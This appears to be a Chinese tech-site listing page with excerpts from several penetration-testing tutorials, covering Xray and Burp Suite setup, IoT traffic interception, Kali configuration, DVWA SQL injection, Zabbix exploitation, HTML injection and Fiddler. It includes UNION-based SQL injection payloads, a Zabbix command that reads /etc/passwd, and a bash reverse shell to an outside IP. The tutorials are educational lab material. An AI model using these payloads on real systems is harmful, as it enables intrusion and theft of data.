Burp Suite

渗透测试-地基篇-Xray安装使用-联动burpsuit自动挖洞(十四)

核能气质少年 提交于 2020-12-03 11:35:00
** 渗透测试-地基篇-Xray安装使用-联动burpsuit自动挖洞(十四) ** 作者: 大余 时间:2020-11-30 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 文章目录 渗透测试-地基篇-Xray安装使用-联动burpsuit自动挖洞(十四) 一、前言 二、安装 三、xray基础使用 四、xray联动burpsuite自动挖洞 一、前言 xray是一款由长亭科技出品的可以使用HTTP/HTTPS代理进行被动扫描的安全工具,支持功能如下: 独立的 URL 扫描 基于 HTTP 的被动代理扫描,同时支持HTTPS SQL注入检测模块 命令注入检测模块 任意重定向检测模块 路径遍历模块 Xray扫描器内置插件 XSS漏洞检测 ( key : xss ) :利用语义分析的方式检测XSS漏洞 SQL 注入检测 ( key : sqldet ) :支持报错注入、布尔注入和时间盲注等 命令 / 代码注入检测 (

IoT产品渗透系列(二):LAN下的流量代理抓包

为君一笑 提交于 2020-12-02 15:19:22
近日在工作中遇到了要对IoT产品进行渗透测试,我将会进行一系列的更新,将工作中遇到的问题以及解决的经验分享在CSDN,喜欢的小伙伴请点赞关注。 以太网下的流量代理监控 这个测试适用于在wifi网络或者以太网网络下的流量代理设置指导.在无线网络热点创建之后,在Kali测试环境中配置防火墙转发规则,将无线网络的特定访问流量重定向到BurpSuite中。 其具体的框架图如下所示: 第一步:创建无线热点, 请参考作者文章IoT产品渗透系列(一)《Kali是如何创建热点》 第二步: 在Kali测试环境中增加对指定目标的流量转发,例如将通过无线热点的访问HTTP的流量重定位到本机Burpsuite代理软件的80端口。可使用如下命令 $iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination burpip:burp_http_port 注意: -i 选项指向无线热点的网卡名字, burpip:为开启burpsuit软件的主机IP, burp_http_port为Burpsuite软件监听的端口. 举栗子: Kali测试环境中无线网卡的名字为wlan0 (可通过Ifconfig查询)。被测设备通过此wlan0创建的热点联网与远端服务器进行通讯,远端服务器的端口为80

Burp Suite 入门教程(BURP SUITE TUTORIAL )

旧街凉风 提交于 2020-11-25 01:20:18
参考链接1: https://www.pentestgeek.com/what-is-burpsuite 参考链接2: https://www.pentestgeek.com/web-applications/burp-suite-tutorial-1 参考链接3: https://www.pentestgeek.com/web-applications/how-to-use-burp-suite 参考链接4: https://www.pentestgeek.com/penetration-testing/credential-harvesting-via-mitm-burp-suite-tutorial 注意1:本文中出现的非汉语部分为不翻译更好或者我不知道怎么翻译好。 注意2:我并没有配置出站SOCKS代理,而是简单地将火狐浏览器的代理设置为burp suite,具体步骤参照我之前发布的 kali linux Burp Suite极简使用教程 什么是Burp Suite 什么是Burp Suite? Burp Suite是一个基于Java的Web渗透测试框架。 它已成为信息安全专业人员使用的行业标准工具套件。 Burp Suite可帮助您识别漏洞并验证影响Web应用程序的攻击媒介。 由于其受欢迎程度,广度以及功能的深度,他们创建了这个有用的页面作为Burp

kali环境配置

家住魔仙堡 提交于 2020-11-22 07:20:39
1.配置源及刷新软件列表 建议用官方默认源: # vi /etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolling main non-free contrib 刷新源软件列表 apt-get update 尽量不要使用 apt-get upgrade 更新全部软件,可能会破坏原有软件的稳定性,用到时单一软件安装或更新。 <!--more--> 补充源: #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清华大学 deb http:/

SQL Injection

淺唱寂寞╮ 提交于 2020-11-21 01:27:10
Low级别 判断是否存在注入点 输入1提交 输入1 and 1=1提交 SELECT first_name, last_name FROM users WHERE user_id = ' 1 ' 输入1 and 1=2提交 由上可以看出是存在注入点的,参数为id SELECT first_name, last_name FROM users WHERE user_id = ' id ' 利用漏洞获取信息 获取当前库名 1后面的‘是为了使前面的参数闭合最后的#是为了注释‘ 1 ' union select 1,database()# 实际执行sql SELECT first_name, last_name FROM users WHERE user_id = ' 1 ' union select 1 , database ()# ' 根据库名获取所有表名 1后面的‘是为了使前面的参数闭合最后的#是为了注释‘ 1 ' union select 1,table_name from information_schema.tables where TABLE_SCHEMA= ' dvwa ' # 底层执行sql SELECT first_name, last_name FROM users WHERE user_id = ' 1 ' union select 1 ,table_name

网络安全Day07

喜欢而已 提交于 2020-11-02 23:27:17
zabbix Zabbix配置不当安全事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627 京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349 Zabbix弱口令利用 zabbix默认的口令为Admin:zabbix,以及存在guest密码为空 Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 zabbix_get命令调用 登录后可以在后台自定义脚本,执行命令。 默认安装后是开启了guest账户的,如果没有禁止,可以通过guest账户登录,查看信息 这个模块是agent自带的,获取服务器shell,获取root权限。 监控项: bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1 nc -lvp 6666 zabbix_get命令调用: zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]' Zabbix注入 latest.php SQL注入漏洞(CVE-2016-10134) Payload: latest.php

Fiddler 抓取手机微信小程序&APP

淺唱寂寞╮ 提交于 2020-10-28 20:45:22
0x00 前言 这里肯定有人会说为啥不用 burpsuite 要用 Fiddler 呢,这里解释下 bp 挖条件竞争漏洞比较麻烦反正我是用不来。 Fiddler 可能大家都听过 fd 改价格0.1元等等。这里 fd 去挖掘竞争条件漏洞比较舒服(个人感觉) 虚拟机很多 app 闪退这个方法比较好使,burp 同理。 0x01 准备材料 网线一根 360随身wifi一个 安卓手机一个(安卓抓取微信小程序需要将微信降级到6.X版本) 0x02 配置360随身wifi 1.安卓360随身wifi驱动。 下载地址: https://wifi.360.cn 2.傻瓜安装下一步下一步即可。 3.电脑网线接入路由器把wifi关掉 。 4.开启随身wifi手机连接wifi。 0x03 配置Fiddler 1.下载地址: https://pan.baidu.com/s/1Ytt0zxhB7jQqtyIBK-fm7Q 密码:3f4d 。 2.解压打开使用就行了(汉化版)。 3.打开-->工具-->选项 看图全部勾选 (软件提示全部为“是”或同意)。 4.确认配置后重启 Fiddler。 5.查看 Fiddler 的在线 ip。 0x05 修改wifi的代理 ip测试Fiddler的在线ip 端口默认8888 0x06 下载证书并安装(不安装证书抓不到数据) 1.

HTML注入综合指南

若如初见. 提交于 2020-10-21 02:04:06
“ HTML”被视为每个Web应用程序的框架,因为它定义了托管内容的结构和完整状态。那么,您是否想过,是否用一些简单的脚本破坏了这种解剖结构?还是这种结构本身成为Web应用程序损坏的原因?今天,在本文中,我们将学习如何配置错误的HTML代码,从用户那里获取敏感数据。 什么是HTML? HTML称为超文本标记语言,是一种标识性的语言。它包括一系列标签.通过这些标签可以将网络上的文档格式统一,使分散的Internet资源连接为一个逻辑整体。HTML文本是由HTML命令组成的描述性文本,HTML命令可以说明文字,图形、动画、声音、表格、链接等。HTML用于设计包含“超文本”的网站,以便将“文本包含在文本中”作为超链接,并包含包裹数据项以在浏览器中显示的元素组合。 那么这些元素是什么? “元素是HTML页面的所有内容,即,它包含开始和结束标记以及介于两者之间的文本内容。” 1. HTML标签 HTML标签标记了内容片段,例如“标题”,“段落”,“表单”等。标记符中的标记元素用尖括号括起来,带斜杠的元素表示该标记说明结束;大多数标记符必须成对使用,以表示作用的起始和结束。浏览器不会显示这些HTML标记,而是利用它们来捕获网页的内容。 2. HTML属性 超文本标记语言定义了多种数据类型的元素内容,如脚本数据和样式表的数据,和众多类型的属性值,包括ID、名称、URI、数字、长度单位、语言

SQL注入基础知识

萝らか妹 提交于 2020-10-05 09:05:34
SQL注入基础知识 在owasp年度top 10 安全问题中,SQL注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 1.对于Web应用程序而言,用户核心数据存储在数据库中,例如MySQL、SQL server、Oracle 2.通过SQL注入攻击,可以获取、修改、删除数据库信息,并且通过提权来控制Web服务器等其他操作 3.SQL注入即攻击者通过构造特殊的SQL语句,入侵目标系统,致使后台数据库泄露数据的过程 4.因为SQL注入漏洞造成的严重危害性,所以常年稳居owasp top 10的榜首 常见的SQL注入类型 1)可回显注入 可以联合查询的注入 报错注入 通过注入进行DNS请求,从而达到可回显的目的 2)不可回显注入 Bool盲注 时间盲注 1.1 可以联合查询的注入 在可以联合查询的题目中,一般会将数据库查询的数据回显到首页面中,例如 <?php . . . $id = $_GET [ 'id' ] ; $getid = "SELECT id FROM users WHERE user_id = ' $id '" ; $resuit = mysql_query ( $getid ) or

[网络安全自学篇] 八十六.威胁情报分析之Python抓取FreeBuf网站APT文章(上)

試著忘記壹切 提交于 2020-10-03 13:31:40
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入。这篇文章主要讲解威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章,后续会进一步采用数据挖掘、机器学习、知识图谱等方法进行深入分析。基础性文章,希望对您有所帮助~ 作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~ 文章目录 一.FreeBuf主网站分析 二.Python抓取文章标题 三.正文内容抓取 四.正文爬取完整代码 五.总结 作者的github资源: 软件安全: https://github.com/eastmountyxz/Software-Security-Course 其他工具: https://github.com/eastmountyxz/NetworkSecuritySelf-study Windows-Hacker: https:/